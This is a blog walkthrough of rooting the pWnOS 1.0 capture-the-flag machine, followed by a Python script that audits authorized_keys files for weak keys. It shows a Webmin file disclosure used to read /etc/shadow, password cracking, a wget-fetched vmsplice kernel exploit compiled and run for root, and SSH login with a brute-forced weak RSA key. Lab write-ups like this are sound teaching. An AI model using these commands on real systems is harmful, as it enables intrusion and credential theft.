Sunday, April 28 2019
CTF pWnOS 1.0 - Kamranmohsin.com

pWnOS: 1.0 Vulnerable Machine Walkthrough

It’s been a long time since I wrote a blog post. I hope to keep writing this time, starting with a vulnerable machine walkthrough.

You can easily download the image for this VM from VulnHub.

The walkthrough will be detailed. Let’s start with this machine.

I have already set up this virtual machine in VMware Workstation. You will be greeted with the screen below once you start the pWnOS machine, whether in VMware Workstation or another virtualization tool.

pWnOS machine booted

I have already logged into my Kali machine. It’s time to get the IP address of the pWnOS machine with netdiscover, a command-line utility that comes prebuilt in Kali, as seen below:

netdiscover

Knowing which services are running on the target machine helps to build an attack surface. We use Nmap, a command-line utility, to find the services running on the target system’s ports.

nmap

Various ports are open; we see that MiniServ 0.01 (Webmin httpd) is running on port 10000. After googling, I found that the target is running a vulnerable version. Luckily, I found an exploit for it in Metasploit.

available exploit

1st Method

We use the highlighted auxiliary module.

We see that the RPATH variable is set to /etc/passwd by default; let’s extract it:

/etc/passwd

Now set the RPATH variable to /etc/shadow and extract it too:

/etc/shadow

We got 5 hashes from the shadow file; save them in a file named shadow.txt, as used in the command below.

John the Ripper, a command-line utility, will help crack them with the following command:

john --wordlist=/usr/share/wordlists/rockyou.txt --fork=5 shadow.txt

Luckily, John cracked 1 hash out of 5.

The cracked password let us log in via SSH as shown below:

Let’s see what rights/privileges the vmware user has:

As we saw, vmware has no special privileges, so we investigate the kernel further.

After googling, we found the following exploit for this vulnerable kernel version; you can easily find it in Kali via searchsploit.

Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)

I started the apache2 web server on my Kali machine to host this exploit with the following command:

service apache2 start

Copy the exploit to the web server root.

cp /usr/share/exploitdb/exploits/linux/local/5092.c /var/www/html/

Now download the exploit on the victim machine via the limited shell, then compile the C program with gcc, which comes pre-installed on the target.

wget http://192.168.10.8/5092.c
gcc 5092.c -o exploit
./exploit

Hurray, we got root 😉

2nd Method

There is another method too. When we looked at /etc/passwd, we saw a few users listed at the very end. Each of these users can log in to pWnOS via SSH, and each has an authorized_keys file in the hidden .ssh directory of their home directory; let’s fetch it via the RPATH variable.

authorized key of vmware user

You might be wondering why we are interested in the authorized keys. Well, in this scenario we are lucky enough to have a file disclosure vulnerability, which gives us access to the authorized_keys file in each user’s home directory. Each authorized key corresponds to an RSA private key.

Now, where do we get the RSA keys? Good question 😀 Google solved this problem too. The link below has a repository of keys for both 1024 and 2048 bits; here we need the 2048-bit RSA keys.

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

The command below will download the set of RSA keys. I have already downloaded it to my Kali machine.

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2

Now extract the file with the following command:

tar vxjf 5622.tar.bz2

It’s time for brute forcing (finding which RSA key matches the authorized key).

cd rsa
grep -lr authorized_key

We found it; now log in via SSH and run the local privilege escalation exploit as we did in the 1st method.

ssh -i 2048/d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.10.10

Hurray, we got root again 😀

If you are interested in reading about configuring SSH key-based authentication on a Linux server, do read my blog post here.

Thanks for stopping by; if you like this blog post, do leave a comment below.
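The second method works because the authorized_keys entries on the target come from a small, publicly known key set. Added example, not from the original post: a defender-side audit that parses each authorized_keys entry, computes its OpenSSH SHA256 fingerprint, and flags keys that appear in a weak-key blacklist or whose RSA modulus is shorter than 2048 bits. The sample file and the blacklist are constructed here (the moduli are made-up numbers); a real check would load the fingerprints of the published weak-key set.

```python
import base64, hashlib, struct
def _read_string(blob, off):  # one length-prefixed field of an SSH wire-format blob
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n
def parse_pubkey(line):
    """Return (key_type, rsa_modulus_bits or None, SHA256 fingerprint) for one line."""
    tokens = line.split()  # options such as from="..." may precede the key type
    idx = next((i for i, t in enumerate(tokens) if t.startswith(("ssh-", "ecdsa-"))), None)
    if idx is None or idx + 1 >= len(tokens): return None
    blob = base64.b64decode(tokens[idx + 1])
    fp = "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).rstrip(b"=").decode()
    ktype, off = _read_string(blob, 0)
    bits = None
    if ktype == b"ssh-rsa":  # wire format: string "ssh-rsa", mpint e, mpint n
        _e, off = _read_string(blob, off)
        n, _ = _read_string(blob, off)
        bits = int.from_bytes(n, "big").bit_length()
    return ktype.decode(), bits, fp
def audit_authorized_keys(text, blacklist, min_rsa_bits=2048):
    """Return [(line_no, fingerprint, reason)] for keys that should be removed."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parsed = parse_pubkey(line)
        if parsed is None:
            continue
        _ktype, bits, fp = parsed
        if fp in blacklist:
            findings.append((lineno, fp, "fingerprint in weak-key blacklist"))
        elif bits is not None and bits < min_rsa_bits:
            findings.append((lineno, fp, f"RSA modulus only {bits} bits"))
    return findings
def _mpint(v):  # minimal big-endian encoding with the sign bit clear
    b = v.to_bytes(v.bit_length() // 8 + 1, "big")
    return struct.pack(">I", len(b)) + b
def _ssh_rsa_line(e, n, comment):
    blob = struct.pack(">I", 7) + b"ssh-rsa" + _mpint(e) + _mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode() + " " + comment
# Constructed sample file: the moduli are made-up numbers, not real RSA keys.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample, not a real key set",
    _ssh_rsa_line(65537, (1 << 2047) | 0x10001, "vmware@pwnos"),
    _ssh_rsa_line(65537, (1 << 1023) | 0x10001, "legacy@host"),
    _ssh_rsa_line(65537, (1 << 2047) | 0x3, "ok@host"),
])
# Constructed blacklist; a real one holds fingerprints of the published weak-key set.
WEAK_KEY_FINGERPRINTS = {parse_pubkey(SAMPLE_AUTHORIZED_KEYS.splitlines()[1])[2]}
```

Running `audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_KEY_FINGERPRINTS)` reports the blacklisted key on line 2 and the 1024-bit key on line 3, and leaves the third key alone.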

About Kamran Mohsin

Kamran Mohsin is a Certified Ethical Hacker, currently working as a penetration tester at a private company in Pakistan. He is also doing a Masters in Information Security. He previously worked in web development (front- and back-end). Over time he took an interest in hacking and has been writing blogs on information security since late 2015.
